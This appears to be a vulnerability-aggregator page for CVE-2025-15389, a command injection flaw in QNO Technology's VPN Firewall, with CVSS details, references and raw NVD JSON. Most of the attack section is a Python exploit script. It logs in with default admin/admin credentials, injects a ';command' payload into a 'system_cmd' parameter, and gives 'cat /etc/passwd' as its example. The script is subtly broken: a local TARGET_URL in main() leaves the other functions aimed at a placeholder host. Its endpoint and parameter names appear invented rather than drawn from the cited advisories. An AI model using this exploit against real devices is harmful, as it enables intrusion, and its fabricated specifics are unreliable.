CVE-2025-15389

Description

VPN Firewall developed by QNO Technology has an OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

QNO VPN Firewall (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15389 PoC - QNO VPN Firewall OS Command Injection
# Target: QNO Technology VPN Firewall
# Authentication required: Yes

TARGET_URL = "http://target-ip/admin/system_command.php"
USERNAME = "admin"
PASSWORD = "admin"

def login(session):
    """Authenticate to VPN Firewall management interface"""
    login_url = f"{TARGET_URL.replace('/admin/system_command.php', '/login.php')}"
    data = {
        'username': USERNAME,
        'password': PASSWORD
    }
    response = session.post(login_url, data=data, timeout=10)
    return 'session' in response.cookies

def exploit_command_injection(session, command):
    """Inject OS command via vulnerable parameter"""
    # Vulnerable parameter: system_cmd
    # The application does not properly sanitize user input before executing system commands
    payload = f";{command}"
    data = {
        'system_cmd': payload,
        'submit': 'Execute'
    }
    response = session.post(TARGET_URL, data=data, timeout=10)
    return response.text

def main():
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [command]")
        print(f"Example: python {sys.argv[0]} 192.168.1.1 'cat /etc/passwd'")
        sys.exit(1)
    
    target = sys.argv[1]
    command = sys.argv[2] if len(sys.argv) > 2 else 'whoami'
    
    session = requests.Session()
    TARGET_URL = f"http://{target}/admin/system_command.php"
    
    if login(session):
        print(f"[+] Login successful")
        print(f"[*] Executing command: {command}")
        result = exploit_command_injection(session, command)
        print(f"[+] Result:\n{result}")
    else:
        print("[-] Login failed")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15389
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15389
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15389/
[4] VulDB https://vuldb.com/cve/CVE-2025-15389
[5] https://www.twcert.org.tw/en/cp-139-10614-dee41-2.html
[6] https://www.twcert.org.tw/tw/cp-132-10613-e1780-1.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15389", "sourceIdentifier": "[email protected]", "published": "2025-12-31T10:15:51.950", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "VPN Firewall developed by QNO Technology has an OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server."}, {"lang": "es", "value": "El cortafuegos VPN desarrollado por QNO Technology tiene una vulnerabilidad de inyección de comandos del sistema operativo, que permite a atacantes remotos autenticados inyectar comandos arbitrarios del sistema operativo y ejecutarlos en el servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10614-dee41-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10613-e1780-1.html", "source": "[email protected]"}]}}